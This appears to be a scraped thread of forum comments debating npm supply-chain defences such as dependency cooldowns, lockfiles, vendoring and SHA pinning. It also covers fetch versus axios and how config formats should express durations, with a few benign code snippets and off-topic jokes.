As I wrote, if you are running compromised software in production, you want to fix it ASAP. In first moments you may not even know whether bad things will happen or not, just that you are shipping malicious code to your users. Even if you are lucky enough to determine with 100% confidence (putting your job on the line) that the compromise is inconsequential, you don’t want to keep shipping that code for another hour because your install step fails due to a random CI infra hiccup making registry inaccessible (as happened in my experience at least half dozen times in years prior, though luckily not in a circumstance where someone attempted to push an urgent security fix). Now imagine it’s not a random hiccup but part of a coordinated targeted attack, and somehow it becomes something anticipated.
> Number 2 hasn't been much of an issue for a long time. npm doesn't allow unpublishing package after 72 hours (apart from under certain rare conditions).
Those rare conditions exist. Also, you are making it sound as if the registry is infallible, and no humans and/or LLMs there accept untrusted input from their environment.
The key aspect of modern package managers, when used correctly, is that even when the registry is compromised you are fine as long as integrity check crypto holds up and you hold on to your pre-compromise dependency tree. The latter is not a technical problem but a human problem, because conditions can be engineered in which something may slip past your eyes. If this slip-up can be avoided at little to no cost—in fact, with benefits, since zero-installs shortens CI times, and therefore time-to-fix, due to dramatically shorter or fully eliminated install step—it should be a complete no-brainer.
> Don't know about number 3. Would feel to me that if you have something running that can modify the lockfile, they can probably also modify the checked-in tars.
As I wrote, I suspect it’d complicate such attacks or make them easier to spot, not make them impossible.
I'd argue that it is ideal, in the sense that it's the sweet spot for a general config file format to limit itself to simple, widely reusable building blocks. Supporting more advanced types can get in the way of this.
Programs need their own validation and/or parsing anyway, since correctness depends on program-specific semantics and usually only a subset of the values of a more simply expressed type is valid. That same logic applies across inputs: config may come from files, CLI args, legacy formats, or databases, often in different shapes. A single normalization and validation path simplifies this.
General formats must also work across many languages with different type systems. More complex types introduce more possible representations and therefore trade-offs. Even if a file parser implements them correctly (and consistently with other such parsers), it must choose an internal form that may not match what a program needs, forcing extra, less standard transformation and adding complexity on both sides for little gain.
Because acceptable values are defined by the program, not the file, a general format cannot fully specify them and shouldn’t try. Its role is to be a medium and provide simple, human-usable (for textual formats), widely supported types, avoid forcing unnecessary choices, and get out of the way.
All in all, I think it can be more appropriate for a program to pick a parsing library for a more complex type, than to add one consistently to all parsers of a given file format.
IMO interceptors are bad. they hide what might get transformed with the API call at the place it is being used.
> Likewise, every response I get is JSON. There's no reason to manually unwrap the response into JSON every time.
This is not true unless you are only interfacing with your own backends. Even then, why not just make a helper that unwraps as JSON by default but can be passed an arg to parse as something else?
I removed the locks from all the doors, now entering/exiting is 87% faster! After removing all the safety equipment, our vehicles have significantly improved in mileage, acceleration and top speed!
> Few languages have good models for evolving their standard library
Can you name some examples?
You might want to elaborate on the "etc.", since HTML updates are glacial.
(The classic example being passwords: we wouldn’t need MFA is everybody just “got good” and used strong/unique passwords everywhere. But that’s manifestly unrealistic, so instead we use our discipline budget on getting people to use password managers and phishing-resistant MFA.)
Django and Spring
There's clearly merit to both sides, but personally I think a major underlying cause is that libraries are trusted. Obviously that doesn't match reality. We desperately need a permission system for libraries, it's far harder to sneak stuff in when doing so requires an "adds dangerous permission" change approval.
start_at = 2026-05-27T07:32:00Z # RFC 3339
start_at = 2026-05-27 07:32:00Z # readable
We should extend it with durations: timeout = PT15S # RFC 3339
And like for datetimes, we should have a readable variant: timeout = 15s # can omit "P" and "T" if not ambiguous, can use lowercase specifiers
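A config loader could normalize such shorthand itself while the format lacks a duration type. This is a hypothetical sketch of that normalization, not part of any TOML proposal; the supported units are an assumption:

```javascript
// Normalize shorthand duration strings ("15s", "90m", "2h", "7d")
// to a single canonical unit (seconds), the way a config loader
// might if the file format only carries plain strings.
const UNIT_SECONDS = { s: 1, m: 60, h: 3600, d: 86400 };

function parseDuration(text) {
  const match = /^(\d+)\s*([smhd])$/.exec(text.trim());
  if (!match) throw new Error(`unrecognized duration: ${text}`);
  return Number(match[1]) * UNIT_SECONDS[match[2]];
}
```

This is also one answer to the inconsistency noted elsewhere in the thread: if every tool normalized to one unit internally, the configured unit would just be surface syntax.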
Edit: discussed in detail here: https://github.com/toml-lang/toml/issues/514
The entire history of malware lol
Urgent fix, patch released, invisible to dev team cause they put in a 7 day wait. Now our app is vulnerable for up to 7 days longer than needed (assuming daily deploys. If less often, pad accordingly). Not a great excuse as to why the company shipped an "updated" version of the app with a standing CVE in it. "Sorry, we were blinded to the critical fix because we set an arbitrary local setting to ignore updates until they are 7 days old". I wouldn't fire people over that, but we'd definitely be doing some internal training.
For example, esbuild and typescript 7 split binaries for different systems and architectures into separate packages, and rely on your package manager to pull the correct one.
It's like the difference in protecting your home from burglars and foreign nation soldiers. Both are technically invaders to your home, but the scope is different, and the solutions are different.
It’s not needed anymore.
Why wouldn't that work well with legacy projects? In fact, the projects I was a part of that I'd call legacy nowadays were built by copy-and-pasting .js libraries into a "vendor/" directory, and that's how we shipped it as well. This was in the days before Bower (which was the npm of frontend development back in the day); vendoring JS libs was standard practice before package managers became used in frontend development too.
Not sure why it wouldn't work, JavaScript is a very moldable language, you can make most things work one way or another :)
With Bun I use less dependencies from NPM than I used from Nuget with .NET to build minimal apis. For example the pg driver.
just shipping from npm crap is essentially the equivelant of running your production code base against Arch AUR pkgbuilds.
fetch responses have a .json() method. It's literally the first example in MDN: https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/U...
It's literally easier than not using JSON because I have to think about if I want `response.text()` or `response.body()`.
You still have multiple programming languages preinstalled on your OS, no matter which one it is.
Yes - the postinstall hook attack vector goes away. You can do SHA pinning since Git's content addressing means that SHA is the hash of the content. But then your "lockfile" equivalent is just... a list of commit SHAs scattered across import statements in your source? Managing that across a real dependency tree becomes a nightmare.
This is basically what Deno's import maps tried to solve, and what they ended up with looked a lot like a package registry again.
At least npm packages have checksums and a registry that can yank things.
Package managers should do the same thing
I'd contrast Python with Go, which has an amazing stdlib for the domains that Go targets. This last part is key--Go has a more focused scope than Python, and that makes it easier for its stdlib to succeed.
const myfetch = async (req, options = {}) => {
  options.headers = options.headers || {};
  options.headers['Authorization'] = token; // token defined elsewhere in your auth state
  const res = await fetch(new Request(req, options));
  if (res.status === 401) {
    // do your thing
    throw new Error("oh no");
  }
  return res;
};
Convenience is a thing, but it doesn't require a massive library.
The PNG spec [7] has been updated several times in 1996, 1998, 1999, and 2025.
The XPath spec [8] has multiple versions: 1.0 (1999), 2.0 (2007), 3.0 (2014), and 3.1 (2017), with 4.0 in development.
The RDF spec [9] has multiple versions: 1.0 (2004), and 1.1 (2014). Plus the related specs and their associated versions.
The schema.org metadata standard [10] is under active development and is currently on version 30.
[1] https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/... (New)
[2] https://web.dev/baseline/2025 -- popover API, plain text content editable, etc.
[3] https://web.dev/baseline/2024 -- exclusive accordions, declarative shadow root DOM
[4] https://web.dev/baseline/2023 -- inert attribute, lazy loading iframes
[5] https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/... (Baseline 2023)
[6] https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/... (2020)
[7] https://en.wikipedia.org/wiki/PNG
[8] https://en.wikipedia.org/wiki/XPath
[9] https://en.wikipedia.org/wiki/Resource_Description_Framework
[10] https://schema.org/
(Please do correct me if this is wrong, again, I don't have the experience myself.)
[1] https://pkg.odin-lang.org/
[2] https://www.gingerbill.org/article/2025/09/08/package-manage...
but, please don't use LLM to help write it from sketches. Even show the sketch :)
Much of my writing is very sketch-y. Some people don't like it, but it's mine and I am proud of it, and I hope that even if you write sketches/refine them, you can be comfortable sharing your ideas in your words in the way you wish to write them, carl!
My thinking is that I improve my writing by, well... practice itself. So I write publicly, and there are some thoughts which occur in my head during the writing process itself (PG has a good article about it recently).
In a world of AI, to me, Human writing is a breath of fresh air. Please don't fall into the rabbit-hole that you might need LLM to help write you.
These are just my 2 cents though, but I feel like I am definitely not alone in thinking so.
Have a nice day and I am looking forward for you to write the article yourself. Feel free to share me when you do with my mail as I would love to read it, as I am also passionate about the funding of open source :)
MFA is typically enforced by organizations, forcing discipline. Individual usage of MFA is dramatically lower
Nor is fetch a good client-side API either; you want progress indicators, on both upload and download. Fetch is a poor API all-round.
For Star Wars, they retconned it to mean he found the shortest possible route through dangerous space, so even for Han Solo's quote, it's still distance.
Do you run automatic dependency updates over the weekend? Wouldn't you rather do that during fully-staffed hours?
As long as you don't update your pins during an active supply chain attack, the risk surface is rather low.
True. But seconds are not the base unit for package compromises coming to light. The appropriate unit for that is almost certainly days.
Initially I assumed this was sarcastic, but apparently not. UX and performance are what programmers are paid for! Making sure UX is good is one of the most important things in a programmer's job.
While security is a moving target, a goal, something that can never be perfect, just "good enough" (if NSA wants to hack you, they will). You make it sound like installing third party packages is basically equivalent to a security hole, while in practice the risk is low, especially if you don't overdo it.
Wild to read extreme security views like that, while at the same time there are people here that run unconstrained AI agents with --dangerous-skip-confirm flags and see nothing wrong with it.
So Python's clearly not "batteries included" enough to avoid this kind of risk.
Scaling security with the popularity of a repo does seem like a good idea.
This is javascript, not Java.
In JavaScript something entirely new would be invented, to solve a problem that has long been solved and is documented in 20+ year old books on common design patterns. So we can all copy-paste `{ or: [{ days: 42, months: 2, hours: "DEFAULT", minutes: "IGNORE", seconds: null, timezone: "defer-by-ip" }, { timestamp: 17749453211*1000, unit: "ms"}]` without any clue as to what we are defining.
In Java, a 6000LoC+ ecosystem of classes, abstractions, dependency-injectables and probably a new DSL would be invented so we can all say "over 4 Malaysian workdays"
They explained it in the Solo movie.
https://www.reddit.com/r/MovieDetails/comments/ah3ptm/solo_a...
It's just a library for handling time that 98% of the time your app will be using for something else.
I doubt anyone cares about an hour more or less in this context. But if you want multiple implementations to agree talking about seconds on a monotonic timer is a lot simpler
At work, we're happy with Python's included batteries when we need to make scripts instead of large programs.
Yeah, pretty bad idea.
Like congratulations, your dev was compromised a whole 10 minutes after he ran the code.
In my experience, this works great for libraries internal to an organization (UI components, custom file formats, API type definitions, etc.). I don't see why it wouldn't also work for managing public dependencies.
Plus it's ecosystem-agnostic. Git submodules work just as well for JS as they do for Go, sample data/binary assets, or whatever other dependencies you need to manage.
The irony is that this is actually the current best practice to defend against supply chain attacks in the github actions layer. Pin all actions versions to a hash. There's an entire secondary set of dev tools for converting GHA version numbers to hashes
And for good reason. There are enough platform differences that you have to write your own code on top anyway.
Really? I thought 'asking you every time they want to do something' was called 'security fatigue' and generally considered to be a bad thing. Yes you can concatenate files in the current project, Claude.
And yes, we agree that running unconstrained AI agents with --dangerous-skip-confirm flags and seeing nothing wrong with it is insane. Kind of like just advertising for burglars to come open your doors for you before you get home - yeah, it's lots faster to get in (and to move about the house with all your stuff gone).
Depends. If you had to add your dependencies to a Makefile yourself, you sure as hell aren't going to add 5k dependencies manually just to get a function that does $FOO; you'd write it yourself.
Now, with AI in the mix, there's fewer and fewer reasons to use so many dependencies.
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Refe...
> It's a very simple ship, very economical ship, although the modifications he made to it are rather extensive – mostly to the navigation system to get through hyperspace in the shortest possible distance (parsecs).
No. Axios is still maintained. They have not deprecated the project in favor of fetch.
new_date = add_workdays(
workdays=1.5,
start=datetime.now(),
regions=["es", "mx", "nl", "us"],
)
If you're referring to my packages on npm, I joined way late to that game. This was also ~15 years ago.
Tell me about it. Using AI Chatbots (not even agents), I got a MVP of a packaging system[1] to my liking (to create packages for a proprietary ERP system) and an endpoint-API-testing tool, neither of which require a venv or similar to run.
------------------------------
[1] Okay, all it does now is create, sign, verify and unpack packages. There's a roadmap file for package distribution, which is a different problem.
I think you're incorrect to say that seconds are also ambiguous. Maybe what you mean is that days are more practical, but that seems very much a personal preference.
> Why do you believe that motivated threat hunters won’t continue to analyze and find threats in new versions of open source software in the first week after release?
I'm sure they will, but attackers will adapt. And I'm really unconvinced that these delays are really going to help in the real world. Imagine you rely on `popular-dependency` and it gets compromised. You have a cooldown, but I, the attacker, issue "CVE-1234" for `popular-dependency`. If you're at a company you now likely have a compliance obligation to patch that CVE within a strict timeline. I can very, very easily pressure you into this sort of thing.
I'm just unconvinced by the whole idea. It's fine, more time is nice, but it's not a good solution imo.
Because it is so few lines it is much more sensible to have everyone duplicate that little snippet manually than import a library and write interceptors for that...
(Not only because the integration with the library would likely be more lines of code, but also because a library is a significantly liability on several levels that must be justified by significant, not minor, recurring savings.)
Daylight saving time makes a day take 23 hours or 25 hours. That makes a week take 601200 seconds or 608400 seconds. Etc.
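The 23-hour day is easy to demonstrate with fixed UTC offsets. Using the 2024 US spring-forward date as an assumed example (any DST transition works), local midnight to the next local midnight spans only 23 hours of elapsed time:

```javascript
// US Eastern time switched from EST (-05:00) to EDT (-04:00) on
// 2024-03-10, so the "day" from local midnight to local midnight
// contains only 23 real hours.
const beforeShift = new Date("2024-03-10T00:00:00-05:00"); // EST midnight
const afterShift  = new Date("2024-03-11T00:00:00-04:00"); // EDT midnight

// Date subtraction yields milliseconds of actual elapsed time.
const elapsedHours = (afterShift - beforeShift) / 3600000;
console.log(elapsedHours); // 23
```

This is why "7 days" is only unambiguous once you decide whether a day means 24 hours or one calendar day.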
So it looks like even if no one actually updates, the vast majority of the cases will be caught by automated tools. You just need to give them a bit of time.
Mine's about 100 LOC. There's a lot you can get wrong. Having a way to use a known working version and update that rather than adding a hundred potentially unnecessary lines of code is a good thing. https://github.com/mikemaccana/fetch-unfucked/blob/master/sr...
> import a library and write interceptors for that...
What are you suggesting people would have to intercept? Just import a library you trust and use it.
(This is all in the context of cooldowns, where I’m not convinced the there’s any real ambiguity risk by allowing the user to specify a duration in day or hour units rather than seconds. In that context a day is exactly 24 hours, regardless of what your local savings time rules are.)
You can find the patch files for your OSs by registering at Oracle with a J3EE8.4-PatchLibID (note, the older J3EE16-PatchLib-ids aren't compatible), attainable from your regional Oracle account-manager.
A joke should be funny though, not just a dry description of real life, so let's leave it at that. We've already taken it too far.
You could specify that for the purposes of cooldowns you want "hour" to mean an interval of 3600 seconds. But that you have to specify that should illustrate how ambiguous the concept of an hour is. It's not a useless concept by any means and I far prefer to specify duration in hours and days, but you have to spend a sentence or two on defining which definition of hours and days you are using. Or you don't and just hope nobody cares enough about the exact cooldown duration
- Don't waste time rewriting and maintaining code unnecessarily. Install a package and use it.
- Have a minimum release age.
I do not know what the issue is.